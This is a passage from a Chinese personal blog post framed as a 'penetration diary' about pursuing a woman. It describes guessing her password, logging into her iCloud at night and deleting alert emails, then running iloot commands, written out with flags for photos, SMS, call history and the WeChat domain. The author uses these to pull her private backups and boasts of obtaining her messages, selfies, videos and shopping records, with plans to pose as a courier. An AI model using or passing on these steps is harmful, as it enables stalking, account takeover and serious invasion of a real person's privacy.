10.5pt; line-height: 1.5;">大小写字幕数字且超过8位（一般修改它常用密码首个字母或者单词为大写，成功率50%（尝试过20个以上美女得出结论））</span><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 2.尝试登录web icloud，时间绝笔要是月黑风高，然后快速删除邮件。web icloud上你懂的自拍通讯录 必须有（事实上也有很多没有同步）</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 3.同步云备份，这上边就有很多东西了,同步云备份需要工具，尝试了很多（尼玛全部都是收费的，说是免费，一道关键东西就来请下载专业版，还特贵几百刀），最后iloot工具基本是唯一选择。</font><br></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 4.iloot的使用：</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp;&nbsp;</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp; 全部拖：iloot.py appleid password</span><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp;&nbsp;</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp; 只拖相关数据：</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">iloot.py appleid password&nbsp;</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">–item-types photos,</span><font face="Microsoft YaHei UI">movies,sms,call_histery (图片只拖.jpg 视频只拖.mov,可自行修改源码换其他后缀)</font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp;&nbsp;</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp; 拖指定域：</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">iloot.py appleid password –domain com.tencent.xin 只拖微信域</span><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp;&nbsp;</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp; 你以为这样就能成功了，告诉你，你实际尝试的时候各种坑等着，1.安装的时候按照它说的方法，你绝壁不能成功，有些库需要自己到googlecoode手动下载安装，2.此工具没有断点续传，你一来就拖全部，只能告诉你天真，多次使用，得出结论，必然断，然后再重来，然后又断，所以你最好指定域指定域中相关数据，慢慢来。</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;"><br></span></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 5.拖回来数据处理，短信记录必然有，sqlsite的，通话记录有，拖微信域，在他目录下qrcode目录中可以找到二维码，可以加女神微信，什么美图相机应用（尼玛使用率真高），关于微信聊天和qq聊天记录的解密还没有找到方法？我想应该是有办法的，因为我已经知道了qq账户和密码，还得继续研究（不过用微信传视频是可以拖出来看），有没有可能拖出cookie，欺骗登录？（书到用时方恨少，不会ios开发）</font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 自此我们掌握了女神的邮件、短信、通话记录、自拍照、自拍小视频，购物记录（ps:冒充送快递）</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">0x05 未能做到的尝试和总结</font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 手机种马，电脑种马，小明能力有限还在学习，我还是个孩子。</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 本文很多都是经验之谈，可能有些理解错误，请看官指导，有更好的方法请指教</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 请期待下一篇：【小明渗透日记】小明要租房</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp;&nbsp;</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI"><br></font></div>

<div><a href="http://www.wiz.cn/i/93198460" title="来自为知笔记(Wiz)" target="_blank" rel="noopener">来自为知笔记(Wiz)</a></div>
      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div></div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="L.N. 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="L.N. 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    L.N.
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://tycx2ry.github.io/2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/" title="【小明渗透日记】追寻女神">https://tycx2ry.github.io/2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2015/04/16/30d75fc1c7cf126c4abc187d734caf8b/" rel="next" title="读《crossdomain.xml : Beware of Wildcards》">
                <i class="fa fa-chevron-left"></i> 读《crossdomain.xml : Beware of Wildcards》
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2015/05/07/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e5-b0-8f-e6-98-8e-e8-a6-81-e7-a7-9f-e6-88-bf/" rel="prev" title="【小明渗透日记】小明要租房">
                【小明渗透日记】小明要租房 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar_1.gif"
                alt="L.N." />
            
              <p class="site-author-name" itemprop="name">L.N.</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">169</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">分类</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">184</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/tycx2ry" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i></a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:516421987@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i></a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="javascript:alert('微信号:e2-y1-e2')" target="_blank" title="Wechat">
                      
                        <i class="fa fa-fw fa-weixin"></i></a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="javascript:alert('QQ号:516421987')" target="_blank" title="QQ">
                      
                        <i class="fa fa-fw fa-qq"></i></a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2011 &mdash; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">L.N.</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  









  



  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  

  
  
    <script id="ribbon" type="text/javascript" size="300" alpha="0.6"  zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    
      <script id="dsq-count-scr" src="https://myblog-zemfusx5zy.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'https://tycx2ry.github.io/2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/';
          this.page.identifier = '2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/';
          this.page.title = '【小明渗透日记】追寻女神';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://myblog-zemfusx5zy.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  














  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("4tk5loSxj8U1iyLcqOmdjx8c-gzGzoHsz", "5CqxvVk78wJt5t5ab8F2RHIX");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  
  


  

  

</body>
</html>
